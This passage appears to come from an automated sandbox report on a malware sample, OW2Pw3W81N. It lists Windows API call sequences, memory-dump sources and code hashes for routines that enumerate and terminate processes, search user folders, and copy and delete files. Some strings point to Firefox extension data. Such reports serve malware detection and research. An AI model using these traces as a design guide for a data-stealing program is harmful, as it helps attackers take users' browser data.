                              • DeleteFileA.KERNEL32(00000000), ref: 0040DA32
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 370323d9a074025678898ae999b6463eb423e9135e59877d35bb5260e336077f
                              • Instruction ID: 30f7704c13366a17925c5eaa4a94e79927efa66a8a92483c7baa761e0d0dbf9b
                              • Opcode Fuzzy Hash: 370323d9a074025678898ae999b6463eb423e9135e59877d35bb5260e336077f
                              • Instruction Fuzzy Hash: 848122719111089BCB04FBE1DD52EEE7339AF14314F50452EF407A6091EF386A9ACB7A
                              APIs
                                • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                • Part of subcall function 022F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022F8DED
                                • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022EDA68
                              • lstrlen.KERNEL32(00000000), ref: 022EDC06
                              • lstrlen.KERNEL32(00000000), ref: 022EDC1A
                              • DeleteFileA.KERNEL32(00000000), ref: 022EDC99
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                              • Instruction ID: e51021cc05e9b01495d3c9b4beddaf08489f87548c774fb85cca9c9e29f9c888
                              • Opcode Fuzzy Hash: 75d72e7265c2b0bcdfeb4fd8a00493fe315c357100f507a1e1d65a562648f628
                              • Instruction Fuzzy Hash: BB81D2729203149BCB48FBE4DD65DEEB33AAF64300F50457DE60A66194EF346A48CF61
                              APIs
                                • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                              • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421580,00420D92), ref: 0040F54C
                              • lstrlenA.KERNEL32(00000000), ref: 0040F56B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                              • String ID: ^userContextId=4294967295$moz-extension+++
                              • API String ID: 998311485-3310892237
                              • Opcode ID: c6d68fb0603da1e25a23b90469779a044771ff029b5026b29d5fc07adc8ee29f
                              • Instruction ID: 431312e06e4e118a9a68feb07ac8eaa96768a2afdec7ba1937323e72019175af
                              • Opcode Fuzzy Hash: c6d68fb0603da1e25a23b90469779a044771ff029b5026b29d5fc07adc8ee29f
                              • Instruction Fuzzy Hash: 19516575D11108AACB04FBB1DC52DED7338AF54314F40852EF81667191EE386B9ACBAA
                              APIs
                              • memset.MSVCRT ref: 004194EB
                                • Part of subcall function 00418D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                • Part of subcall function 00418D50: HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                • Part of subcall function 00418D50: wsprintfW.USER32 ref: 00418D78
                              • OpenProcess.KERNEL32(00001001,00000000,?), ref: 004195AB
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 004195C9
                              • CloseHandle.KERNEL32(00000000), ref: 004195D6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                              • String ID:
                              • API String ID: 396451647-0
                              • Opcode ID: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                              • Instruction ID: faa3cbc47edc6d62fcde4c42a86d6f60d7c6cb9d9231cedff5acf80003c00c5b
                              • Opcode Fuzzy Hash: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                              • Instruction Fuzzy Hash: E3315C75E4020CAFDB14DFD0CD49BEDB7B9EB44300F10441AE506AA284DB78AE89CB56
                              APIs
                              • memset.MSVCRT ref: 022F9752
                                • Part of subcall function 022F8FB7: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,022F9785,00000000), ref: 022F8FC2
                                • Part of subcall function 022F8FB7: RtlAllocateHeap.NTDLL(00000000), ref: 022F8FC9
                                • Part of subcall function 022F8FB7: wsprintfW.USER32 ref: 022F8FDF
                              • OpenProcess.KERNEL32(00001001,00000000,?), ref: 022F9812
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 022F9830
                              • CloseHandle.KERNEL32(00000000), ref: 022F983D
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                              • String ID:
                              • API String ID: 3729781310-0
                              • Opcode ID: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                              • Instruction ID: 40eaccba01de93cecdb031b94f83505154004dcf8ee5387ef2e94164c31c680f
                              • Opcode Fuzzy Hash: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                              • Instruction Fuzzy Hash: 663148B5E10348EFDB54DFE0CD48BEDB779EB45300F504428E606AA288DB786A84CF52
                              APIs
                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 004186CA
                              • Process32First.KERNEL32(?,00000128), ref: 004186DE
                              • Process32Next.KERNEL32(?,00000128), ref: 004186F3
                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                              • CloseHandle.KERNEL32(?), ref: 00418761
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: 653c6250bfa2d25ce81b68ad29b9700611fbfcd40e1672ae0763ab040719d4ec
                              • Instruction ID: 8f5abf7c5654a811b9b3f094c7d3948ba22bca0c3321aba4e2188e2e86b1b5ea
                              • Opcode Fuzzy Hash: 653c6250bfa2d25ce81b68ad29b9700611fbfcd40e1672ae0763ab040719d4ec
                              • Instruction Fuzzy Hash: F7315E71902218ABCB24EF95DC45FEEB778EF45714F10419EF10AA21A0DF386A85CFA5
                              APIs
                                • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 022F8931
                              • Process32First.KERNEL32(?,00000128), ref: 022F8945
                              • Process32Next.KERNEL32(?,00000128), ref: 022F895A
                                • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                              • CloseHandle.KERNEL32(?), ref: 022F89C8
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                              • Instruction ID: 538e5d387702898786944a35597ff044d29542a62b893d1b8f5695b26c8807ea
                              • Opcode Fuzzy Hash: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                              • Instruction Fuzzy Hash: 9A318D71911318ABCB64DF94CD44FEEF379EB45700F1041A9E60EA22A4DB346E88CF91
                              APIs
                                • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                              • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414F7A
                              • lstrcatA.KERNEL32(?,00421070), ref: 00414F97
                              • lstrcatA.KERNEL32(?,0070F820), ref: 00414FAB
                              • lstrcatA.KERNEL32(?,00421074), ref: 00414FBD
                                • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                              • Instruction ID: b2f553c39a7574946245b6cc91baeb706efbd34a5fe7bafabb54328a91102e52
                              • Opcode Fuzzy Hash: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                              • Instruction Fuzzy Hash: FA213DBAA402047BC714FBF0EC46FED333DAB55300F40455DB649920C1EE7896C88B96
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E28,00000000,?), ref: 0041882F
                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E28,00000000,?), ref: 00418836
                              • wsprintfA.USER32 ref: 00418850
                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 2716131235-2206825331
                              • Opcode ID: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                              • Instruction ID: e741bf7ca2fc1d65a497d39fe48fe123552d5275a0b8a8093fc8d321cf3eb0b5
                              • Opcode Fuzzy Hash: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                              • Instruction Fuzzy Hash: 48217FB5A80208BFDB00DFD4DD49FAEBBB9FB49B00F104119F605A7280C779A900CBA5
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcessstrtok_s
                              • String ID:
                              • API String ID: 3407564107-0
                              • Opcode ID: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                              • Instruction ID: 4c607d35608c189c973395c563414f92be7623a87be4eb9aeec53e3cd5ce4e36
                              • Opcode Fuzzy Hash: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                              • Instruction Fuzzy Hash: 67115B75910209EFCB04DFE4D958AEDBB75FF04705F408469E90967250E7705B14CF65
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 004179B0
                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E00,00000000,?), ref: 004179B7
                              • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 004179C4
                              • wsprintfA.USER32 ref: 004179F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 1243822799-0
                              • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                              • Instruction ID: 87643aaeb61937c0b28f46190d625ee9f9fa63f6271d25fb840393839df263de
                              • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                              • Instruction Fuzzy Hash: 6D1139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280E3395940CBB5
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 022F7C17
                              • RtlAllocateHeap.NTDLL(00000000), ref: 022F7C1E
                              • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 022F7C2B
                              • wsprintfA.USER32 ref: 022F7C5A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                              • String ID:
                              • API String ID: 377395780-0
                              • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                              • Instruction ID: 55b915544e306526a7f24f824c9259a5c326e43306ee120ffebf3e302949d2a3
                              • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                              • Instruction Fuzzy Hash: 461127B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280D2795940CBB1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 022F7CCA
                              • RtlAllocateHeap.NTDLL(00000000), ref: 022F7CD1
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 022F7CE4
                              • wsprintfA.USER32 ref: 022F7D1E
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                              • Instruction ID: bf295138270c4cc69baab17ac4a5d8d362901366e9326c417245979d569bef1b
                              • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                              • Instruction Fuzzy Hash: 93113CB1A45218EBEB248F94DD49FA9F7B8FB05721F1043AAF61AA32C0C77459408B51
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: strtok_s
                              • String ID:
                              • API String ID: 3330995566-0
                              • Opcode ID: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                              • Instruction ID: 3903c414c8317c720e5190a219f0d88bad3482c58d54c9ec0353ddc74ca36816
                              • Opcode Fuzzy Hash: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                              • Instruction Fuzzy Hash: 00115AB0E1020AEFCB14CFE6D848BEEB7B5FB04704F00C028E525A6254D7789500CF54
                              APIs
                              • CreateFileA.KERNEL32(022F3D55,80000000,00000003,00000000,00000003,00000080,00000000,?,022F3D55,?), ref: 022F9563
                              • GetFileSizeEx.KERNEL32(000000FF,022F3D55), ref: 022F9580
                              • CloseHandle.KERNEL32(000000FF), ref: 022F958E
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID:
                              • API String ID: 1378416451-0
                              • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                              • Instruction ID: 75cb15518caf11755f34c3d1d7ad2f19003ac83350c760d849f3d7a93ac02722
                              • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                              • Instruction Fuzzy Hash: A2F0AF39E50208BBDB60DFF0DC49B9EB7BAEB49310F10C264FA11A7284D63596418B40
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022F6D31
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 022F6D4F
                              • CloseHandle.KERNEL32(00000000), ref: 022F6D60
                              • Sleep.KERNEL32(00001770), ref: 022F6D6B
                              • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022F6D81
                              • ExitProcess.KERNEL32 ref: 022F6D89
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                              • Instruction ID: a436c3b8b3d6e45c776222cd66e80b7e4a486e22324e16c618ce5a4eb0828588
                              • Opcode Fuzzy Hash: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                              • Instruction Fuzzy Hash: 19F05E7A9A030AAEF790ABE1DC08BBDB67AEB05741F101538F722A5194CBB04500CA56
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: `o@
                              • API String ID: 0-590292170
                              • Opcode ID: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                              • Instruction ID: c65cc5113f4fbf7636557f8b1f026e9f2285814709fd8c8344c4410f81c0aea8
                              • Opcode Fuzzy Hash: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                              • Instruction Fuzzy Hash: A66138B4900219EFCB14DF94E944BEEB7B1BB04304F1185AAE40A77380D739AEA4DF95
                              APIs
                                • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                              • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414BEA
                              • lstrcatA.KERNEL32(?,00740248), ref: 00414C08
                                • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00740EC8,?,000003E8), ref: 00414A4A
                                • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
